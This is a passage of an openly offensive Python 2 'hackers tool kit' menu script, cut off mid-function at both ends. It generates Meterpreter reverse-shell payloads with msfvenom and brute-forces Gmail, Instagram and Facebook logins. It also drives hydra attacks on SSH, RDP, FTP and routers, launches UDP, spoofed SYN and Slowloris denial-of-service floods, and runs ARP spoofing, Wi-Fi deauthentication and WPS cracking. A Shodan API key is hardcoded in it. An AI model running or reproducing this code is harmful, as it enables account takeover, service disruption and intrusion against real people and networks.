socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if 